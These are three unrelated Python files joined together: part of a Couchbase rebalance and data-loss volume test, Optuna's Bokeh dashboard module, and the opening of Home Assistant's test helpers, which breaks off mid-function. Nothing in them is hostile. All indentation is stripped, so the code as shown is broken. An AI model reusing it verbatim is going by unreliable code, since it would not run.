total_doc, start_at, updated=self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at, updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load*(updated-1),
batch=self.batch_size, instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc-self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0, self.instances,
updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated +=1
new_server_list = list(set(new_server_list) - set(servers_out))
# swap rebalance 1 node
self.log.info("==========swap rebalance 1 node=========")
servers_in = self.servers[self.nodes_init: self.nodes_init + 1]
servers_init = self.servers[:self.nodes_init]
servers_out = self.servers[(self.nodes_init - 1): self.nodes_init]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load*(updated-1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 2 nodes and Rebalance In 1 node=========")
# Rebalance out of 2 nodes and Rebalance In 1 node
servers_in = [list(set(self.servers) - set(new_server_list))[0]]
servers_out = list(set(new_server_list) - {self.master})[-2:]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1),
batch=self.batch_size, instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 1 nodes and Rebalance In 2 nodes=========")
# Rebalance out of 1 nodes and Rebalance In 2 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:2]
servers_out = list(set(new_server_list) - {self.master})[0:1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance in 4 nodes =========")
# Rebalance in 4 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list + servers_in))
self.log.info("==========Rebalance out 4 nodes =========")
# Rebalance out 4 nodes
servers_out = list(set(new_server_list) - {self.master})[0:4]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list) - set(servers_out))
self.log.info(
"======Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups=========")
# Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
self.log.info("======Graceful failover 1 KV node and add back(Delta and Full)=========")
# Graceful failover 1 KV node and add back(Delta and Full)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
fail_over_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=True)
fail_over_task.result()
self.sleep(120)
# do a recovery and rebalance
rest.set_recovery_type('ns_1@' + kv_server.ip, recoveryType=self.recoveryType)
rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
errors1=self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
errors2=self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
if len(errors1) > 0 or len(errors2) > 0:
self.fail("data is missing");
def load_till_rebalance_progress(self, rest, bucket, total_doc, start_at):
rebalance_status = rest._rebalance_progress_status()
self.log.info("###### Rebalance Status:{} ######".format(rebalance_status))
self.sleep(10)
while rebalance_status == 'running':
self.log.info("===== Loading {} as rebalance is going on =====".format(self.reload_size))
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(self.master, b, self.reload_size,
self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for t in load_thread:
t.join()
rebalance_status = rest._rebalance_progress_status()
self.log.info("###### Rebalance Status:{} ######".format(rebalance_status))
total_doc += self.reload_size
start_at = total_doc
return total_doc, start_at
def create_update_till_rebalance_progress(self, rest, bucket, total_doc, start_at, updated):
rebalance_status = rest._rebalance_progress_status()
self.log.info("###### Rebalance Status:{} ######".format(rebalance_status))
self.sleep(10)
while rebalance_status == 'running':
self.log.info("===== Loading {} as rebalance is going on =====".format(self.reload_size))
load_thread = []
update_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(self.master, b, self.reload_size,
self.batch_size, self.threads,
start_at, self.threads)))
update_thread.append(Thread(target=self.update_buckets_with_high_ops,
args=(self.master, b, self.initial_load, self.initial_load,
self.batch_size, self.threads, 0, self.instances, updated)))
for t in load_thread:
t.start()
for th in update_thread:
th.start()
for t in load_thread:
t.join()
for th in update_thread:
th.join()
rebalance_status = rest._rebalance_progress_status()
self.log.info("###### Rebalance Status:{} ######".format(rebalance_status))
total_doc += self.reload_size
start_at = total_doc
updated += 1
return total_doc, start_at, updated
def shuffle_nodes_between_zones_and_rebalance(self, to_remove=None):
"""
Shuffle the nodes present in the cluster if zone > 1. Rebalance the nodes in the end.
Nodes are divided into groups iteratively i.e. 1st node in Group 1, 2nd in Group 2, 3rd in Group 1 and so on, when
zone=2.
:param to_remove: List of nodes to be removed.
"""
if not to_remove:
to_remove = []
serverinfo = self.servers[0]
rest = RestConnection(serverinfo)
zones = ["Group 1"]
nodes_in_zone = {"Group 1": [serverinfo.ip]}
# Create zones, if not existing, based on params zone in test.
# Shuffle the nodes between zones.
if int(self.zone) > 1:
for i in range(1, int(self.zone)):
a = "Group "
zones.append(a + str(i + 1))
if not rest.is_zone_exist(zones[i]):
rest.add_zone(zones[i])
nodes_in_zone[zones[i]] = []
# Divide the nodes between zones.
nodes_in_cluster = [node.ip for node in self.get_nodes_in_cluster()]
nodes_to_remove = [node.ip for node in to_remove]
for i in range(1, len(self.servers)):
if self.servers[i].ip in nodes_in_cluster and self.servers[i].ip not in nodes_to_remove:
server_group = i % int(self.zone)
nodes_in_zone[zones[server_group]].append(self.servers[i].ip)
# Shuffle the nodesS
for i in range(1, self.zone):
node_in_zone = list(set(nodes_in_zone[zones[i]]) -
{node for node in rest.get_nodes_in_zone(zones[i])})
rest.shuffle_nodes_in_zones(node_in_zone, zones[0], zones[i])
otpnodes = [node.id for node in rest.node_statuses()]
nodes_to_remove = [node.id for node in rest.node_statuses() if node.ip in [t.ip for t in to_remove]]
# Start rebalance and monitor it.
started = rest.rebalance(otpNodes=otpnodes, ejectedNodes=nodes_to_remove)
if started:
result = rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
# Verify replicas of one node should not be in the same zone as active vbuckets of the node.
if self.zone > 1:
self._verify_replica_distribution_in_zones(nodes_in_zone)
def update_buckets_with_high_ops(self, server, bucket, items, ops,
batch=20000, threads=5, start_document=0,
instances=1,update_counter=1):
import subprocess
#cmd_format = "python3 scripts/high_ops_doc_loader.py --node {0} --bucket {1} --user {2} --password {3} " \
# "--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --instances {" \
# "9} --ops {10} --updates --update_counter {11}"
cmd_format = "python3 scripts/thanosied.py --spec couchbase://{0} --bucket {1} --user {2} --password {3} " \
"--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --workers {9} --rate_limit {10} " \
"--passes 1 --update_counter {11}"
cb_version = RestConnection(server).get_nodes_version()[:3]
if self.num_replicas > 1:
cmd_format = "{} --replicate_to 1".format(cmd_format)
cmd = cmd_format.format(server.ip, bucket.name, server.rest_username,
server.rest_password,
items, batch, threads, start_document,
cb_version, instances, int(ops), update_counter)
self.log.info("Running {}".format(cmd))
result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output = result.stdout.read()
error = result.stderr.read()
if error:
self.log.error(error)
self.fail("Failed to run the loadgen.")
if output:
loaded = output.split('\n')[:-1]
total_loaded = 0
for load in loaded:
total_loaded += int(load.split(':')[1].strip())
self.assertEqual(total_loaded, ops,
"Failed to update {} items. Loaded only {} items".format(
ops,
total_loaded))
def load_buckets_with_high_ops(self, server, bucket, items, batch=20000, threads=10, start_document=0, instances=1
,ttl=0):
import subprocess
#cmd_format = "python3 scripts/high_ops_doc_loader.py --node {0} --bucket {1} --user {2} --password {3} " \
# "--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --instances {9} --ttl {10}"
cmd_format = "python3 scripts/thanosied.py --spec couchbase://{0} --bucket {1} --user {2} --password {3} " \
"--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --workers {9} --ttl {10}" \
"--passes 1"
cb_version = RestConnection(server).get_nodes_version()[:3]
if self.num_replicas > 0 and self.use_replica_to:
cmd_format = "{} --replicate_to 1".format(cmd_format)
cmd = cmd_format.format(server.ip, bucket.name, server.rest_username, server.rest_password, items, batch,
threads, start_document, cb_version, instances, ttl)
self.log.info("Running {}".format(cmd))
result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = result.stdout.read()
error = result.stderr.read()
if error:
self.log.error(error)
self.fail("Failed to run the loadgen.")
if output:
loaded = output.split('\n')[:-1]
total_loaded = 0
for load in loaded:
total_loaded += int(load.split(':')[1].strip())
self.assertEqual(total_loaded, items,
"Failed to load {} items. Loaded only {} items".format(items, total_loaded))
def load_docs(self, bucket,num_items=0, start_document=0):
if self.loader == "pillowfight":
load_thread = Thread(target=self.load,
name="pillowfight_load",
args=(self.master, self.num_items, self.batch_size, self.doc_size, self.rate_limit))
return load_thread
elif self.loader == "high_ops":
if num_items == 0:
num_items = self.num_items
load_thread = Thread(target=self.load_buckets_with_high_ops,
name="high_ops_load",
args=(self.master, bucket, num_items, self.batch_size,
self.threads, start_document, self.instances))
return load_thread
def check_data(self, server, bucket, num_items=0):
if self.loader == "pillowfight":
return self.check_dataloss(server, bucket, num_items)
elif self.loader == "high_ops":
return self.check_dataloss_for_high_ops_loader(server, bucket, num_items)
def check_dataloss_for_high_ops_loader(self, server, bucket, items,
batch=2000, threads=5,
start_document=0,
updated=False, ops=0,instances=1):
import subprocess
from lib.memcached.helper.data_helper import VBucketAwareMemcached
#cmd_format = "python3 scripts/high_ops_doc_loader.py --node {0} --bucket {1} --user {2} --password {3} " \
# "--count {4} " \
# "--batch_size {5} --instances {9} --threads {6} --start_document {7} --cb_version {8} --validate"
cmd_format = "python3 scripts/thanosied.py --spec couchbase://{0} --bucket {1} --user {2} --password {3} " \
"--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --workers {9} --validation 1 " \
"--passes 1"
cb_version = RestConnection(server).get_nodes_version()[:3]
if updated:
cmd_format = "{} --updated --ops {}".format(cmd_format, int(ops))
cmd = cmd_format.format(server.ip, bucket.name, server.rest_username,
server.rest_password,
int(items), batch, threads, start_document, cb_version, instances)
self.log.info("Running {}".format(cmd))
result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output = result.stdout.read()
error = result.stderr.read()
errors = []
rest = RestConnection(self.master)
VBucketAware = VBucketAwareMemcached(rest, bucket.name)
_, _, _ = VBucketAware.request_map(rest, bucket.name)
if error:
self.log.error(error)
self.fail("Failed to run the loadgen validator.")
if output:
loaded = output.split('\n')[:-1]
for load in loaded:
if "Missing keys:" in load:
keys = load.split(":")[1].strip().replace('[', '').replace(']', '')
keys = keys.split(',')
for key in keys:
key = key.strip()
key = key.replace('\'', '').replace('\\', '')
vBucketId = VBucketAware._get_vBucket_id(key)
errors.append(
("Missing key: {0}, VBucketId: {1}".format(key, vBucketId)))
if "Mismatch keys: " in load:
keys = load.split(":")[1].strip().replace('[', '').replace(']', '')
keys = keys.split(',')
for key in keys:
key = key.strip()
key = key.replace('\'', '').replace('\\', '')
vBucketId = VBucketAware._get_vBucket_id(key)
errors.append((
"Wrong value for key: {0}, VBucketId: {1}".format(
key, vBucketId)))
self.log.info("Total number of missing doc:{}".format(len(errors)))
self.log.info("Missing/Mismatch keys:{}".format(errors))
return errors
def test_volume_with_high_ops_reproduce(self):
rest = RestConnection(self.master)
bucket = rest.get_buckets()
start_at = 0
# load initial documents
self.create_ddocs_and_views()
load_thread = []
for bk in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, bk, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
stats_dst = rest.get_bucket_stats()
while stats_dst["curr_items"] < 1200000:
self.sleep(300)
stats_dst = rest.get_bucket_stats()
# Rebalance in 1 node
servers_init = self.servers[:self.nodes_init]
# Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in = self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
errors=self.check_dataloss_for_high_ops_loader(self.master, b, self.num_items, instances=self.instances)
if len(errors) > 0:
self.fail("data is missing");
|
dashboard.py
|
try:
import bokeh.command.bootstrap
import bokeh.document # NOQA
import bokeh.layouts
import bokeh.models
import bokeh.models.widgets
import bokeh.plotting
import bokeh.themes
import tornado.gen
_available = True
except ImportError as e:
_available = False
_import_error = e
import collections
import numpy as np
import threading
import time
from typing import Any # NOQA
from typing import Dict # NOQA
from typing import List # NOQA
from typing import Optional # NOQA
import optuna.logging
import optuna.structs
import optuna.study
_mode = None # type: Optional[str]
_study = None # type: Optional[optuna.study.Study]
_HEADER_FORMAT = '''
<style>
body {{
margin: 20px;
}}
h1, p {{
margin: 10px 0px;
}}
</style>
<h1>Optuna Dashboard (Beta)</h1>
<p>
<b>Study name:</b> {study_name}<br>
</p>
'''
_DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S'
if _available:
class _CompleteTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
complete_trials = [
trial for trial in trials
if trial.state == optuna.structs.TrialState.COMPLETE
]
self.trial_ids = set([trial.trial_id for trial in complete_trials])
values = [trial.value for trial in complete_trials]
best_values = np.minimum.accumulate(values, axis=0)
self.cds = bokeh.models.ColumnDataSource({
'#': list(range(len(complete_trials))),
'value': values,
'best_value': best_values,
})
self.best_value = best_values[-1] if complete_trials else np.inf
def create_figure(self):
# type: () -> bokeh.plotting.Figure
figure = bokeh.plotting.figure(height=150)
figure.circle(x='#', y='value', source=self.cds, alpha=0.3, color='navy')
figure.line(x='#', y='best_value', source=self.cds, color='firebrick')
figure.xaxis[0].axis_label = 'Number of Trials'
figure.yaxis[0].axis_label = 'Objective Value'
return figure
def update(self, new_trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
stream_dict = collections.defaultdict(list) # type: Dict[str, List[Any]]
for trial in new_trials:
if trial.state != optuna.structs.TrialState.COMPLETE:
continue
if trial.trial_id in self.trial_ids:
continue
stream_dict['#'].append(len(self.trial_ids))
stream_dict['value'].append(trial.value)
self.best_value = min(self.best_value, trial.value)
stream_dict['best_value'].append(self.best_value)
self.trial_ids.add(trial.trial_id)
if stream_dict:
self.cds.stream(stream_dict)
class _AllTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
self.cds = bokeh.models.ColumnDataSource(self.trials_to_dict(trials))
def create_table(self):
# type: () -> bokeh.models.widgets.DataTable
return bokeh.models.widgets.DataTable(
source=self.cds,
columns=[
bokeh.models.widgets.TableColumn(field=field, title=field)
for field in [
'trial_id',
'state',
'value',
'params',
'datetime_start',
'datetime_complete'
]
]
)
def update(
self,
old_trials, # type: List[optuna.structs.FrozenTrial]
new_trials, # type: List[optuna.structs.FrozenTrial]
):
# type: (...) -> None
modified_indices = []
modified_trials = []
for i, old_trial in enumerate(old_trials):
new_trial = new_trials[i]
if old_trial != new_trial:
modified_indices.append(i)
modified_trials.append(new_trial)
patch_dict = self.trials_to_dict(modified_trials)
patch_dict = {
k: list(zip(modified_indices, v))
for k, v in patch_dict.items()
}
self.cds.patch(patch_dict)
self.cds.stream(self.trials_to_dict(new_trials[len(old_trials):]))
@staticmethod
def trials_to_dict(trials):
# type: (List[optuna.structs.FrozenTrial]) -> Dict[str, List[Any]]
return {
'trial_id': [trial.trial_id for trial in trials],
'state': [trial.state.name for trial in trials],
'value': [trial.value for trial in trials],
'params': [str(trial.params) for trial in trials],
'datetime_start':
[trial.datetime_start.strftime(_DATETIME_FORMAT)
if trial.datetime_start is not None else None
for trial in trials],
'datetime_complete':
[trial.datetime_complete.strftime(_DATETIME_FORMAT)
if trial.datetime_complete is not None else None
for trial in trials],
}
class _DashboardApp(object):
def __init__(self, study, launch_update_thread):
# type: (optuna.study.Study, bool) -> None
self.study = study
self.launch_update_thread = launch_update_thread
self.lock = threading.Lock()
def __call__(self, doc):
# type: (bokeh.document.Document) -> None
self.doc = doc
self.current_trials = \
self.study.trials # type: Optional[List[optuna.structs.FrozenTrial]]
self.new_trials = None # type: Optional[List[optuna.structs.FrozenTrial]]
self.complete_trials_widget = _CompleteTrialsWidget(self.current_trials)
self.all_trials_widget = _AllTrialsWidget(self.current_trials)
self.doc.title = 'Optuna Dashboard (Beta)'
header = _HEADER_FORMAT.format(
study_name=self.study.study_name)
self.doc.add_root(
bokeh.layouts.layout([
[bokeh.models.widgets.Div(text=header)],
[self.complete_trials_widget.create_figure()],
[self.all_trials_widget.create_table()]
], sizing_mode='scale_width'))
if self.launch_update_thread:
thread = threading.Thread(target=self.thread_loop)
thread.daemon = True
thread.start()
def thread_loop(self):
# type: () -> None
while True:
time.sleep(1)
new_trials = self.study.trials
with self.lock:
need_to_add_callback = (self.new_trials is None)
self.new_trials = new_trials
if need_to_add_callback:
self.doc.add_next_tick_callback(self.update_callback)
@tornado.gen.coroutine
def update_callback(self):
# type: () -> None
with self.lock:
current_trials = self.current_trials
new_trials = self.new_trials
self.current_trials = self.new_trials
self.new_trials = None
assert current_trials is not None
assert new_trials is not None
self.complete_trials_widget.update(new_trials)
self.all_trials_widget.update(current_trials, new_trials)
def _check_bokeh_availability():
if not _available:
raise ImportError(
'Bokeh is not available. Please install Bokeh to use the dashboard. '
'Bokeh can be installed by executing `$ pip install bokeh`. '
'For further information, please refer to the installation guide of Bokeh. '
'(The actual import error is as follows: ' + str(_import_error) + ')')
def _show_experimental_warning():
logger = optuna.logging.get_logger(__name__)
logger.warning('Optuna dashboard is still highly experimental. Please use with caution!')
def _get_this_source_path():
# type: () -> str
path = __file__
# Sometimes __file__ points to a *.pyc file, but Bokeh doesn't accept it.
if path.endswith('.pyc'):
path = path[:-1]
return path
def serve(study, bokeh_allow_websocket_origins=None):
# type: (optuna.study.Study, Optional[List[str]]) -> None
global _mode, _study
_check_bokeh_availability()
_show_experimental_warning()
# We want to pass the mode (launching a server? or, just writing an HTML?) and a target study
# to our Bokeh app. Unfortunately, as we are using `bokeh.command.bootstrap.main` to launch
# our Bokeh app, we cannot directly pass Python objects to it. Therefore, we have no choice but
# to use global variables to pass them.
_mode = 'serve'
_study = study
# TODO(akiba): Stop using Bokeh's CLI entry point, and start the HTTP server by ourselves.
# This is not a very clean way to launch Bokeh server.
# Another seemingly better way is to
# instantiate and launch `bokeh.server.server.Server` by ourselves. However, in this way,
# for some reason, we found that the CDS update is not reflected to browsers, at least on Bokeh
# version 0.12.15. In addition, we will need to do many configuration to servers, which can be
# done automatically with the following one line. So, for now, we decided to use this way.
command = ['bokeh', 'serve', '--show', _get_this_source_path()]
if bokeh_allow_websocket_origins is not None:
for bokeh_allow_websocket_origin in bokeh_allow_websocket_origins:
command.extend(['--allow-websocket-origin', bokeh_allow_websocket_origin])
bokeh.command.bootstrap.main(command)
def write(study, out_path):
# type: (optuna.study.Study, str) -> None
global _mode, _study
_check_bokeh_availability()
_show_experimental_warning()
_mode = 'html'
_study = study
bokeh.command.bootstrap.main(['bokeh', 'html', _get_this_source_path(), '-o', out_path])
def _run():
# type: () -> None
# Please note that `_study` and `optuna.dashboard._study` are different here. Here, this module
# is loaded inside Bokeh, and thus it is not `optuna.dashboard`, but `bk_script_????`.
study = optuna.dashboard._study
mode = optuna.dashboard._mode
assert study is not None
app = _DashboardApp(study, launch_update_thread=(mode == 'serve'))
doc = bokeh.plotting.curdoc()
app(doc)
if __name__.startswith('bk_script_'):
# Here, this module is loaded inside Bokeh. Therefore, we should launch the Bokeh app.
_run()
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
import collections
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
import functools as ft
from io import StringIO
import json
import logging
import os
import pathlib
import threading
import time
import uuid
from aiohttp.test_utils import unused_port as get_test_instance_port # noqa
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
auth_store,
models as auth_models,
permissions as auth_permissions,
providers as auth_providers,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import recorder
from homeassistant.components.device_automation import ( # noqa: F401
_async_get_device_automation_capabilities as async_get_device_automation_capabilities,
_async_get_device_automations as async_get_device_automations,
)
from homeassistant.components.mqtt.models import Message
from homeassistant.config import async_process_component_config
from homeassistant.const import (
ATTR_DISCOVERED,
ATTR_SERVICE,
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_PLATFORM_DISCOVERED,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import State
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import setup_component
from homeassistant.util.async_ import run_callback_threadsafe
import homeassistant.util.dt as date_util
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.yaml.loader as yaml_loader
from tests.async_mock import AsyncMock, Mock, patch
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = "https://example.com/app"
CLIENT_REDIRECT_URI = "https://example.com/app/callback"
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)
).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return asyncio.run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop
).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), "testing_config", *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
hass = loop.run_until_complete(async_test_home_assistant(loop))
loop_stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
loop_stop_event.set()
orig_stop = hass.stop
hass._stopped = Mock(set=loop.stop)
def start_hass(*mocks):
"""Start hass."""
asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
loop_stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop):
